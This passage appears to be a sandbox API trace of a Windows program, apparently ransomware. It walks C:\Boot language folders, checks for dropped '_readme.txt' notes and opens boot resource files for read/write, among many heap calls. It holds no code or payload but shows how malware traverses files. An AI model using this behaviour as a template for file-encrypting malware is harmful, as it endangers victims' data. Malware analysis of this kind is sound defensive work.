returned 0x328ec10 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.818] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.818] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0146.818] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.818] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.818] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.819] PathFindFileNameW (pszPath="") returned="" [0146.819] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.819] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.819] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.819] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.819] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.819] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.819] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.819] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0146.819] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0146.819] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.819] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.820] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.820] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.820] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.820] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned=".mui" [0146.820] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.820] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.820] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.820] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned=".txt" [0146.820] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.820] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.820] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.820] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.820] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.820] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.820] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.820] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.820] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.820] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.820] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.820] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.820] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.820] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.820] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.820] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.820] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.820] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.820] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.821] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.821] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.822] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.822] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.822] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.822] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.822] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.822] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.822] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.822] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.822] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.822] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.822] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.822] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.822] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.822] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.822] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.822] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.822] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.822] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.822] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.822] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.822] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0146.822] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.822] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.822] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.822] PathFindFileNameW (pszPath="") returned="" [0146.822] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.822] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.823] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.823] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.823] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.823] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.823] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.823] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.823] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0146.823] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.823] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0146.823] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.823] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.823] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.823] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.823] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.823] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned=".mui" [0146.823] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.824] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec504f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.824] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.824] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.824] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned=".txt" [0146.824] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec504f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.824] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.824] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.824] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.824] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.824] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.824] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.824] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.824] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.824] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.824] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.824] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.824] HeapFree (in: 